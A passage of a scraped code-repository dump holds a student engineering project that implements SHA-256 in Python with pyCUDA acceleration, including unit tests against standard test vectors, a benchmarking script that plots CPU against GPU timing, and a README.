long string!' * 100)\n\n small.convert_string_to_binary()\n small.add_padding()\n\n medium.convert_string_to_binary()\n medium.add_padding()\n\n large.convert_string_to_binary()\n large.add_padding()\n\n # print(large.get_msg_length())\n\n self.assertEqual(len(small.binary_msg_with_padding_and_length) % 512, 0)\n self.assertEqual(len(medium.binary_msg_with_padding_and_length) % 512, 0)\n self.assertEqual(len(large.binary_msg_with_padding_and_length) % 512, 0)\n\n def test_breaking_into_chunks(self):\n large = helper.Helper('this is a long string!' * 100)\n large.convert_string_to_binary()\n large.add_padding()\n large.break_message_into_chunks()\n\n self.assertEqual(len(large.chunks), 35)\n\n # print(large.chunks)\n\n def test_copy_chunks(self):\n medium = helper.Helper('example' * 10)\n medium.convert_string_to_binary()\n medium.add_padding()\n medium.break_message_into_chunks()\n\n medium.copy_chunk_bits()\n for i in range(16):\n self.assertEqual(len(medium.w[i]), 32)\n\n small = helper.Helper('a')\n small.convert_string_to_binary()\n small.add_padding()\n small.break_message_into_chunks()\n\n small.copy_chunk_bits()\n for i in range(16):\n self.assertEqual(len(small.w[i]), 32)\n\n # Arithmetic/shift/rotate only tests ARITHMETIC - it does not check for aligned zeros (i.e. '0010' instead of '10')\n\n def test_rotate_bits(self):\n bits = '00101'\n rotated_bits = logic.rotate_bits(bits, 2) # shift right by 2 spaces\n excess_rotations = logic.rotate_bits(bits, 14) # more rotations than bits (cyclic)\n self.assertEqual(rotated_bits, '01001')\n self.assertEqual(excess_rotations, '01010')\n\n def test_shift_bits(self):\n bits = '10100'\n tiny_shift = logic.shift_bits(bits, 1) # test that zeros fill in\n big_shift = logic.shift_bits(bits, 3) # test drop-off of bits\n self.assertEqual(tiny_shift, '1010')\n self.assertEqual(big_shift, '10')\n\n def test_arithmetic(self):\n byte1 = '10101010'\n byte2 = '10010010'\n _xor = logic.xor_binary_strings(byte1, byte2)[2:]\n _xor = helper.Helper.add_leading_zeros(helper.Helper(), _xor)\n\n _and = logic.and_binary_strings(byte1, byte2)[2:]\n _and = helper.Helper.add_leading_zeros(helper.Helper(), _and)\n\n _not = logic.not_binary_string(byte1)[2:]\n\n _add = logic.add_binary_strings(byte1, byte2)[2:]\n\n self.assertEqual(_xor, '00111000')\n self.assertEqual(_and, '10000010')\n self.assertEqual(_not, '11111111111111111111111101010101')\n self.assertEqual(_add, '100111100')\n\n def test_extend_words(self):\n short = helper.Helper('abc')\n short.convert_string_to_binary()\n short.add_padding()\n short.break_message_into_chunks()\n\n short.copy_chunk_bits()\n short.extend_words()\n for i in range(64):\n self.assertEqual(len(short.w[i]), 32)\n\n # randomly-chosen assertions throughout w to validate the extension computation\n self.assertEqual(logic.binary_string_to_binary_int(short.w[16]), 1633837952)\n self.assertEqual(logic.binary_string_to_binary_int(short.w[43]), 657669027)\n self.assertEqual(logic.binary_string_to_binary_int(short.w[58]), 2682456414)\n\n def test_compress(self):\n short = helper.Helper('abc')\n short.convert_string_to_binary()\n short.add_padding()\n short.break_message_into_chunks()\n\n short.copy_chunk_bits()\n short.extend_words()\n short.compress()\n\n self.assertEqual(short.h[0], '10111010011110000001011010111111')\n self.assertEqual(short.h[1], '10001111000000011100111111101010')\n self.assertEqual(short.h[2], '01000001010000010100000011011110')\n self.assertEqual(short.h[3], '01011101101011100010001000100011')\n self.assertEqual(short.h[4], '10110000000000110110000110100011')\n self.assertEqual(short.h[5], '10010110000101110111101010011100')\n self.assertEqual(short.h[6], '10110100000100001111111101100001')\n self.assertEqual(short.h[7], '11110010000000000001010110101101')\n\n long = helper.Helper('abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq')\n long.convert_string_to_binary()\n long.add_padding()\n long.break_message_into_chunks()\n\n long.copy_chunk_bits()\n long.extend_words()\n long.compress()\n\n self.assertEqual(long.h[0], '10000101111001100101010111010110')\n self.assertEqual(long.h[1], '01000001011110100001011110010101')\n self.assertEqual(long.h[2], '00110011011000110011011101101010')\n self.assertEqual(long.h[3], '01100010010011001101111001011100')\n self.assertEqual(long.h[4], '01110110111000001001010110001001')\n self.assertEqual(long.h[5], '11001010110001011111100000010001')\n self.assertEqual(long.h[6], '11001100010010110011001011000001')\n self.assertEqual(long.h[7], '11110010000011100101001100111010')\n\n def test_digest(self):\n short = helper.Helper('abc')\n short.convert_string_to_binary()\n short.add_padding()\n short.break_message_into_chunks()\n\n long = helper.Helper('abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq')\n long.convert_string_to_binary()\n long.add_padding()\n long.break_message_into_chunks()\n\n self.assertEqual(short.digest(), 'ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad')\n self.assertEqual(long.digest(), '248d6a61d20638b8e5c026930c3e6039a33ce45964ff2167f6ecedd419db06c1')\n\n\nif __name__ == '__main__':\n unittest.main()\n\n" }, { "alpha_fraction": 0.5451016426086426, "alphanum_fraction": 0.5594884753227234, "avg_line_length": 34.9421501159668, "blob_id": "bc9128817625548f289562559d2e33639fe5c8a7", "content_id": "60733d309a0788297651359ec183fa8349cd9bbb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4379, "license_type": "permissive", "max_line_length": 92, "num_lines": 121, "path": "/gpu/sha256.py", "repo_name": "ChristopheBrown/HASH", "src_encoding": "UTF-8", "text": "import helper\nimport helper_gpu\nimport numpy as np\nimport time\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches \n\nclass SHA256:\n hasher = None\n msg = None\n chunks = None\n message_length = None\n\n def __init__(self, message, processor='cpu'):\n if (processor == 'cpu'):\n self.hasher = helper.Helper(message)\n elif (processor == 'gpu'):\n self.hasher = helper_gpu.HelperGPU(message)\n\n self.msg = message\n self.message_length = len(message)\n\n def preprocess(self):\n self.hasher.pre_process()\n self.msg = self.hasher.binary_msg_with_padding_and_length\n self.chunks = self.hasher.chunks\n\n def copy_chunks(self):\n self.hasher.copy_chunk_bits() \n self.hasher.extend_words()\n\n def compression_function(self): #comme\n self.hasher.compress()\n\n def digest(self):\n return self.hasher.digest()\n\n\nif __name__ == '__main__':\n message = 'the quick brown fox jumped over the lazy dog' \n \n hash_pre = time.time()\n s = SHA256(message, 'cpu')\n s.preprocess()\n print('(SHA-256) is: {}'.format(s.digest()))\n hash_post = time.time()\n print('Copy chunks finished in {} seconds'.format(s.hasher.timer))\n print('SHA (msg) generated in {} seconds'.format(hash_post-hash_pre))\n \n hash_pre = time.time()\n s = SHA256(message, 'gpu')\n s.preprocess()\n print('(SHA-256) is: {}'.format(s.digest()))\n hash_post = time.time()\n print('Copy chunks finished in {} seconds'.format(s.hasher.timer))\n print('SHA (msg) generated in {} seconds'.format(hash_post-hash_pre))\n \n files = [\"1kb.txt\" , \"10kb.txt\", \"100kb.txt\"]#,\"1mb.txt\", \"bible.txt\"]\n sizes = [\"1 KB\", \"10 KB\", \"100 KB\"]#, \"1 MB\", \"Bible\"]\n \n files_to_include = len(files)\n \n hash_times = np.zeros((files_to_include,2))\n copy_times = np.zeros((files_to_include,2))\n \n for i in range(len(files)):\n with open(files[i], 'r') as file:\n message = file.read().replace('\\n', '')\n \n hash_pre = time.time()\n s = SHA256(message, 'cpu')\n s.preprocess()\n print('(SHA-256) is: {}'.format(s.digest()))\n hash_post = time.time()\n hash_time = hash_post-hash_pre\n print('==========CPU==========')\n print('Copy chunks finished in {} seconds'.format(s.hasher.timer))\n print('SHA ({}) generated in {} seconds'.format(files[i],hash_post-hash_pre))\n \n hash_times[i][0] = hash_time\n copy_times[i][0] = s.hasher.timer\n \n with open(files[i], 'r') as file:\n message = file.read().replace('\\n', '')\n \n hash_pre = time.time()\n s = SHA256(message, 'gpu')\n s.preprocess()\n print('(SHA-256) is: {}'.format(s.digest()))\n hash_post = time.time()\n hash_time = hash_post-hash_pre\n print('==========GPU==========')\n print('Copy chunks finished in {} seconds'.format(s.hasher.timer))\n print('SHA ({}) generated in {} seconds'.format(files[i],hash_post-hash_pre)) \n \n hash_times[i][1] = hash_time\n copy_times[i][1] = s.hasher.timer\n \n \n \n scale_max = files_to_include\n mpl.style.use('seaborn')\n #plt.plot(range(0,scale_max),hash_times[:,0],'r',linewidth=2)\n #plt.plot(range(0,scale_max),hash_times[:,1],'b',linewidth=2)\n plt.plot(range(0,scale_max),copy_times[:,0],'c',linewidth=2)\n plt.plot(range(0,scale_max),copy_times[:,1],'y',linewidth=2)\n plt.title('Python vs PyCUDA')\n plt.ylabel('Execution Time (sec)')\n plt.xlabel('Size of Input Text File')\n x = np.array([0,1,2,3])\n plt.xticks(x, sizes)\n #plt.yscale('log')\n #cpu_plot_hash = mpatches.Patch(color='r', label='Total hash time (CPU)')\n #gpu_plot_hash = mpatches.Patch(color='b', label='Total hash time (GPU)')\n cpu_plot_copy = mpatches.Patch(color='c', label='Copy time (CPU)')\n gpu_plot_copy = mpatches.Patch(color='y', label='Copy time (GPU)')\n plt.legend(handles=[cpu_plot_copy, gpu_plot_copy]) # \n #plt.legend(handles=[cpu_plot_hash, gpu_plot_hash, cpu_plot_copy, gpu_plot_copy]) # \n plt.savefig('cuda_plot.png')\n plt.show() \n \n \n \n\n \n " }, { "alpha_fraction": 0.4500376284122467, "alphanum_fraction": 0.5633414387702942, "avg_line_length": 40.23793029785156, "blob_id": "b528c2381e1578307b491e6ea0463c9636496eb2", "content_id": "383f6a48803210eebdfb9fa99495ed05e648cd36", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11959, "license_type": "permissive", "max_line_length": 126, "num_lines": 290, "path": "/gpu/helper.py", "repo_name": "ChristopheBrown/HASH", "src_encoding": "UTF-8", "text": "\"\"\"\nThe helper.py file is the implementation of the algoirthm that can be found\non the wikipedia article here: https://en.wikipedia.org/wiki/SHA-2#Pseudocode\n\nYou will find similar naming schemes used from the wiki\n\n(c) Christophe Brown 2019\n\n\"\"\"\nimport logic\nimport time\n\n\nclass Helper:\n h_init = [0x6a09e667, 0xbb67ae85,\n 0x3c6ef372, 0xa54ff53a,\n 0x510e527f, 0x9b05688c,\n 0x1f83d9ab, 0x5be0cd19]\n\n k = [0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5,\n 0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174,\n 0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da,\n 0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967,\n 0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85,\n 0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070,\n 0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3,\n 0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2]\n\n msg = None\n binary_msg = None\n binary_msg_plus_one = None\n binary_msg_with_padding = None\n binary_msg_with_padding_and_length = None\n chunks = []\n w = []\n h = [] # this is iteratively updated later in the program\n\n digest = ''\n\n def __init__(self, message=\"hello world\"):\n self.msg = message\n self.w = []\n self.h = []\n self.chunks = []\n for i in range(len(self.h_init)):\n self.h.append(self.extend_to_32_bit(bin(self.h_init[i])[2:]))\n\n def add_leading_zeros(self, val):\n zeros_to_add = 8 - (len(val))\n if zeros_to_add < 0:\n zeros_to_add = 8 - len(val) % 8\n if zeros_to_add == 0:\n return val\n\n val = zeros_to_add * '0' + val\n return val\n\n def extend_to_32_bit(self, val):\n if '0b' in val:\n val = val[2:]\n\n while len(val) < 32:\n val = self.add_leading_zeros('0' + val)\n\n return val[-32:]\n\n def convert_string_to_binary(self):\n ascii_collection = [(ord(c)) for c in self.msg]\n\n ascii_long_form = ''\n for char in range(len(ascii_collection)):\n without_leading_zeros = bin(ascii_collection[char])[2:] # index [2:] gets rid of the \"0b\"\n with_leading_zeros = self.add_leading_zeros(without_leading_zeros)\n ascii_long_form = ascii_long_form + with_leading_zeros\n\n self.binary_msg = ascii_long_form\n\n # append 1 (per hash function spec)\n self.binary_msg_plus_one = ascii_long_form + '1'\n\n def add_padding(self):\n # msg_length + 1 + K = 448 % 512\n msg_length_plus_1 = len(self.binary_msg_plus_one)\n\n k = 0\n while (msg_length_plus_1 + k) % 512 != 448 % 512:\n k += 1\n\n self.binary_msg_with_padding = self.binary_msg_plus_one + k * '0'\n\n # must now satisfy msg_length + 1 + K + 64 % 512 = 0\n # this is accomplished by appending the 64-bit representation of the input msg length\n msg_length_in_binary = bin(len(self.binary_msg))[2:] # index [2:] gets rid of the \"0b\"\n msg_length_padding = 0\n while len(msg_length_in_binary) + msg_length_padding < 64:\n msg_length_padding += 1\n\n self.binary_msg_with_padding_and_length = self.binary_msg_with_padding + msg_length_padding*'0' + msg_length_in_binary\n\n def pre_process(self):\n self.convert_string_to_binary()\n self.add_padding()\n self.break_message_into_chunks()\n\n def get_msg_length(self):\n return len(self.binary_msg_with_padding_and_length)\n\n def break_message_into_chunks(self):\n chunk_count = int(self.get_msg_length() / 512)\n\n for i in range(chunk_count):\n self.chunks.append(self.binary_msg_with_padding_and_length[(i*512):((i+1)*512)])\n # print(f'found {len(self.chunks)} chunks in self.chunks, the chunk count is {chunk_count}')\n\n # this function can be done on GPU\n def copy_chunk_bits(self, new_chunk=None):\n self.w = ['0'*32] * 64\n if new_chunk is None:\n chunk = self.binary_msg_with_padding_and_length[0:512]\n else:\n chunk = new_chunk\n\n\n for i in range(16): # 16 = 512-bit chunk / 32-word segments\n self.w[i] = (chunk[(i*32):((i+1)*32)]) # copy the 32-bit range i*32 to (i+1)*32\n\n # this can be done on a gpu as well\n def extend_words(self):\n for i in range(16, 64): # now extend the rest of w[]\n s0_p1 = logic.rotate_bits(self.w[i-15], 7)\n s0_p2 = logic.rotate_bits(self.w[i-15], 18)\n s0_p3 = logic.shift_bits(self.w[i-15], 3)\n s0_xor1 = logic.xor_binary_strings(s0_p1, s0_p2)[2:]\n s0 = logic.xor_binary_strings(s0_xor1, s0_p3)\n s0 = self.extend_to_32_bit(s0)\n\n s1_p1 = logic.rotate_bits(self.w[i-2], 17)\n s1_p2 = logic.rotate_bits(self.w[i-2], 19)\n s1_p3 = logic.shift_bits(self.w[i-2], 10)\n s1_xor1 = logic.xor_binary_strings(s1_p1, s1_p2)[2:]\n s1 = logic.xor_binary_strings(s1_xor1, s1_p3)\n s1 = self.extend_to_32_bit(s1)\n\n add1 = logic.add_binary_strings(self.w[i-16], s0)\n add1 = self.extend_to_32_bit(add1)\n\n add2 = logic.add_binary_strings(self.w[i-7], s1)\n add2 = self.extend_to_32_bit(add2)\n\n\n w_i_no_padding = logic.add_binary_strings(add1, add2)\n w_i_no_padding = self.extend_to_32_bit(w_i_no_padding)\n\n\n # truncate overflow bits - cap at 32 bits\n w_i = logic.and_binary_strings(w_i_no_padding, '11111111111111111111111111111111')[2:]\n w_i = self.extend_to_32_bit(w_i)\n\n self.w[i] = w_i\n\n def compress(self):\n # this compression function happens for every 512-bit chunk,\n # so after one 512-bit chunk is compressed, it calls this function\n # for the next chunk to be process with the updated 'h' list\n\n # initialize working registers / variables\n a = self.h[0]\n b = self.h[1]\n c = self.h[2]\n d = self.h[3]\n e = self.h[4]\n f = self.h[5]\n g = self.h[6]\n h = self.h[7]\n\n for i in range(64):\n\n # S1\n e_rot_6 = logic.rotate_bits(e, 6)\n e_rot_11 = logic.rotate_bits(e, 11)\n e_rot_25 = logic.rotate_bits(e, 25)\n s1_xor_1 = logic.xor_binary_strings(e_rot_6, e_rot_11)\n _S1 = logic.xor_binary_strings(s1_xor_1, e_rot_25)[2:]\n _S1 = self.extend_to_32_bit(_S1)\n\n # ch\n e_and_f = logic.and_binary_strings(e, f)\n not_e = logic.not_binary_string(e)\n ch_and_1 = logic.and_binary_strings(not_e, g)\n _ch = logic.xor_binary_strings(e_and_f, ch_and_1)[2:]\n _ch = self.extend_to_32_bit(_ch)\n\n # temp1\n add_1 = logic.add_binary_strings(h, _S1)\n add_1 = logic.and_binary_strings(add_1, '11111111111111111111111111111111')[2:]\n add_2 = logic.add_binary_strings(_ch, self.extend_to_32_bit(bin(self.k[i])[2:]))\n add_2 = logic.and_binary_strings(add_2, '11111111111111111111111111111111')[2:]\n add_3 = logic.add_binary_strings(add_1, add_2)\n add_3 = logic.and_binary_strings(add_3, '11111111111111111111111111111111')[2:]\n _temp1 = logic.add_binary_strings(add_3, self.w[i])\n _temp1 = logic.and_binary_strings(_temp1, '11111111111111111111111111111111')[2:]\n _temp1 = self.extend_to_32_bit(_temp1)\n\n # S0\n a_rot_2 = logic.rotate_bits(a, 2)\n a_rot_13 = logic.rotate_bits(a, 13)\n a_rot_22 = logic.rotate_bits(a, 22)\n s0_xor_1 = logic.xor_binary_strings(a_rot_2, a_rot_13)\n _S0 = logic.xor_binary_strings(s0_xor_1, a_rot_22)[2:]\n _S0 = self.extend_to_32_bit(_S0)\n\n # maj\n a_and_b = logic.and_binary_strings(a, b)\n a_and_c = logic.and_binary_strings(a, c)\n b_and_c = logic.and_binary_strings(b, c)\n maj_xor_1 = logic.xor_binary_strings(a_and_b, a_and_c)\n _maj = logic.xor_binary_strings(maj_xor_1, b_and_c)[2:]\n _maj = self.extend_to_32_bit(_maj)\n\n # temp2\n _temp2 = logic.and_binary_strings(logic.add_binary_strings(_S0, _maj)[2:], '11111111111111111111111111111111')[2:]\n _temp2 = self.extend_to_32_bit(_temp2)\n\n # Every ADD operation must & 0xFFFFFFFF (in case of overflow) and be extended back to 32 bits (in case < 32 bits)\n h = self.extend_to_32_bit(g)\n g = self.extend_to_32_bit(f)\n f = self.extend_to_32_bit(e)\n e = logic.and_binary_strings(logic.add_binary_strings(d, _temp1)[2:], '11111111111111111111111111111111')[2:]\n e = self.extend_to_32_bit(e)\n\n d = self.extend_to_32_bit(c)\n c = self.extend_to_32_bit(b)\n b = self.extend_to_32_bit(a)\n a = logic.and_binary_strings(logic.add_binary_strings(_temp1, _temp2)[2:], '11111111111111111111111111111111')[2:]\n a = self.extend_to_32_bit(a)\n\n self.h[0] = logic.and_binary_strings(logic.add_binary_strings(self.h[0], a)[2:],\n '11111111111111111111111111111111')[2:]\n self.h[0] = self.extend_to_32_bit(self.h[0])\n\n self.h[1] = logic.and_binary_strings(logic.add_binary_strings(self.h[1], b)[2:],\n '11111111111111111111111111111111')[2:]\n self.h[1] = self.extend_to_32_bit(self.h[1])\n\n self.h[2] = logic.and_binary_strings(logic.add_binary_strings(self.h[2], c)[2:],\n '11111111111111111111111111111111')[2:]\n self.h[2] = self.extend_to_32_bit(self.h[2])\n\n self.h[3] = logic.and_binary_strings(logic.add_binary_strings(self.h[3], d)[2:],\n '11111111111111111111111111111111')[2:]\n self.h[3] = self.extend_to_32_bit(self.h[3])\n\n self.h[4] = logic.and_binary_strings(logic.add_binary_strings(self.h[4], e)[2:],\n '11111111111111111111111111111111')[2:]\n self.h[4] = self.extend_to_32_bit(self.h[4])\n\n self.h[5] = logic.and_binary_strings(logic.add_binary_strings(self.h[5], f)[2:],\n '11111111111111111111111111111111')[2:]\n self.h[5] = self.extend_to_32_bit(self.h[5])\n\n self.h[6] = logic.and_binary_strings(logic.add_binary_strings(self.h[6], g)[2:],\n '11111111111111111111111111111111')[2:]\n self.h[6] = self.extend_to_32_bit(self.h[6])\n\n self.h[7] = logic.and_binary_strings(logic.add_binary_strings(self.h[7], h)[2:],\n '11111111111111111111111111111111')[2:]\n self.h[7] = self.extend_to_32_bit(self.h[7])\n\n\n def digest(self):\n # print(f'found {len(self.chunks)} chunks in self.chunks')\n for chunk in self.chunks:\n \n hash_pre = time.time()\n self.copy_chunk_bits(chunk)\n hash_post = time.time()\n self.timer = hash_post-hash_pre\n \n self.extend_words()\n self.compress()\n self.digest = ''\n for h in self.h:\n hex_h = hex(logic.binary_string_to_binary_int(h))\n hex_h_length = len(hex_h)\n hex_h = str(hex_h)[2:]\n if len(hex_h) < 8:\n hex_h = self.add_leading_zeros(hex_h)\n self.digest += hex_h\n\n return self.digest\n" }, { "alpha_fraction": 0.7552973628044128, "alphanum_fraction": 0.782638430595398, "avg_line_length": 53.03703689575195, "blob_id": "481e13f85265035419bc6282584774327414e376", "content_id": "b0eb6e03cae538a447cda0bba2a2245a36a3f02b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1463, "license_type": "permissive", "max_line_length": 185, "num_lines": 27, "path": "/README.md", "repo_name": "ChristopheBrown/HASH", "src_encoding": "UTF-8", "text": "# HASH\n\nHASH stands for Hardware Acceleration of Secure Hashing. This repo is an engineering study of SHA-256 algorithm parallelized using python and pyCUDA. \n\n* Github repository: https://github.com/ChristopheBrown/HASH\n* Website: https://cb3534e4750hash.weebly.com/\n\nThe cpu source code (developed with anaconda python 3.7) implementation adapts from the SHA-256 wikipedia artcile pseudocode here: https://en.wikipedia.org/wiki/SHA-2#Pseudocode\n\ncontact: [email protected]\n\nThe cpu implementation is unit tested and is consistent with hashing algorithms that can be found online.\n\nTo run: \n\n* Ensure CUDA, Python, matplotlib, and numpy are installed and runnable on your machine.\n* Clone this repo\n* Open \"gpu/sha256.py\" and modify the \"files\" array in __main__ to run the code with whichever files you like. Large files will take longer\n* Run \"python sha256.py\"\n* Optional, modify the matplotlib code at the bottom to produce graphs. By default, the plot for the execution time of the copy phase will display. More details are in the included PDF.\n\n\nUseful links in making this:\n * SHA-256 calculator: https://xorbin.com/tools/sha256-hash-calculator\n * Decimal-Hex-Binary converter: https://www.mathsisfun.com/binary-decimal-hexadecimal-converter.html\n * Examples used for unit testing: https://csrc.nist.gov/csrc/media/projects/cryptographic-standards-and-guidelines/documents/examples/sha256.pdf\n * Step-by-step SHA-256: https://tools.ietf.org/html/rfc4634#page-6\n \n \n" }, { "alpha_fraction": 0.6149674654006958, "alphanum_fraction": 0.6247288584709167, "avg_line_length": 23.91891860961914, "blob_id": "a4a5391e6c56524e13568289b379be6913064c71", "content_id": "806a2fb49c29a5ad0046e371e5fd9730dde44b69", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 922, "license_type": "permissive", "max_line_length": 87, "num_lines": 37, "path": "/cpu/sha256.py", "repo_name": "ChristopheBrown/HASH", "src_encoding": "UTF-8", "text": "import helper\n\n\nclass SHA256:\n msg = None\n chunks = None\n message_length = None\n\n def __init__(self, message):\n self.hasher = helper.Helper(message)\n\n self.msg = message\n self.message_length = len(message)\n\n def preprocess(self):\n self.hasher.pre_process()\n self.msg = self.hasher.binary_msg_with_padding_and_length\n self.chunks = self.hasher.chunks\n\n def copy_chunks(self):\n self.hasher.copy_chunk_bits()\n self.hasher.extend_words()\n\n def compression_function(self):\n self.hasher.compress()\n\n def digest(self):\n return self.hasher.digest()\n\n\nif __name__ == '__main__':\n message = 'the quick brown fox jumped over the lazy dog'\n\n s = SHA256(message)\n s.preprocess()\n # ensure your version of python supports the statement below\n print('input message is: {} \\ndigest (SHA-256) is: {}'.format(message, s.digest()))\n" } ]
7
smckisson/Barcode-scanner-Front-End
https://github.com/smckisson/Barcode-scanner-Front-End
306e4f908fc91c0cd4574ed27f2e67d49911662a
c99d756c5fc3f2f7ae0ac7855fc36a08e86802b3
ae90115705f9ed38509a535edb4b0bd0b5755fce
refs/heads/master
2021-01-13T13:32:53.871210
2016-12-06T02:11:01
2016-12-06T02:11:01
72,587,067
0
0
null
2016-11-01T23:56:13
2016-10-27T00:35:57
2016-11-01T23:30:22
null
[ { "alpha_fraction": 0.5375191569328308, "alphanum_fraction": 0.5773353576660156, "avg_line_length": 25.1200008392334, "blob_id": "b387d0af3db7f2ed8ecb59e1af22bdb6ff18a7c6", "content_id": "9f2026e560ef64b79822baaad27d8d98d97dde4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 653, "license_type": "no_license", "max_line_length": 77, "num_lines": 25, "path": "/questions/migrations/0002_auto_20161116_2217.py", "repo_name": "smckisson/Barcode-scanner-Front-End", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.10 on 2016-11-16 22:17\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('questions', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='item',\n name='item_barcode_num',\n field=models.CharField(default=' ', max_length=200),\n ),\n migrations.AlterField(\n model_name='location',\n name='loc_barcode_num',\n field=models.CharField(default=' ', max_length=200, unique=True),\n ),\n ]\n" }, { "alpha_fraction": 0.5559219717979431, "alphanum_fraction": 0.5702115893363953, "avg_line_length": 43.925926208496094, "blob_id": "efa6d3b94bbca62d71966d7b3c5383c57e73c49c", "content_id": "83ab280683075516243ee3ca0c6aedf8f8b951b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3639, "license_type": "no_license", "max_line_length": 135, "num_lines": 81, "path": "/questions/migrations/0001_initial.py", "repo_name": "smckisson/Barcode-scanner-Front-End", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.10.3 on 2016-11-15 16:15\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Choice',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('choice_text', models.CharField(max_length=200)),\n ('time_scanned', models.CharField(default=' ', max_length=200)),\n ('person_scanned', models.CharField(default=' ', max_length=200)),\n ],\n ),\n migrations.CreateModel(\n name='Device',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('device_name', models.CharField(max_length=200)),\n ('manufacturer', models.CharField(max_length=200)),\n ('model_number', models.CharField(max_length=200)),\n ('type_equip', models.CharField(max_length=200)),\n ],\n ),\n migrations.CreateModel(\n name='Item',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('item_barcode_num', models.IntegerField(default=0)),\n ('item_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='questions.Device')),\n ],\n ),\n migrations.CreateModel(\n name='Location',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('loc_barcode_num', models.IntegerField(default=0, unique=True)),\n ('loc_name', models.CharField(default=' ', max_length=200)),\n ('admin', models.CharField(max_length=200)),\n ('user_assigned', models.CharField(max_length=200)),\n ],\n ),\n migrations.CreateModel(\n name='LocDev',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('device', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='questions.Device')),\n ('location', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='questions.Location')),\n ],\n ),\n migrations.CreateModel(\n name='Question',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('question_text', models.CharField(max_length=200)),\n ('item_assoc', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='questions.Device')),\n ('location_assoc', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='questions.Location')),\n ],\n ),\n migrations.AddField(\n model_name='choice',\n name='location',\n field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='questions.Location'),\n ),\n migrations.AddField(\n model_name='choice',\n name='question',\n field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='questions.Question'),\n ),\n ]\n" }, { "alpha_fraction": 0.739130437374115, "alphanum_fraction": 0.739130437374115, "avg_line_length": 8.199999809265137, "blob_id": "faf32980579f81f4f25d7258ff693f01f6f39c06", "content_id": "d977d7cab59211351cea35904471cafe431d3391", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 46, "license_type": "no_license", "max_line_length": 26, "num_lines": 5, "path": "/README.md", "repo_name": "smckisson/Barcode-scanner-Front-End", "src_encoding": "UTF-8", "text": "Front END\n\nrun-> \n\npython manage.py runserver\n" } ]
3
yvedeng/DailyCoding
https://github.com/yvedeng/DailyCoding
d9a49170152cf4840a434028e07990e7f27d94c0
16ee4ad3b713455be3f42df52dce99035a4b9fab
4f4257471aa6fafd1c74d7d8ef6a190bcded6ba4
refs/heads/master
2020-04-26T21:10:15.879579
2019-08-19T22:31:30
2019-08-19T22:31:30
173,834,327
0
0
null
null
null
null
null
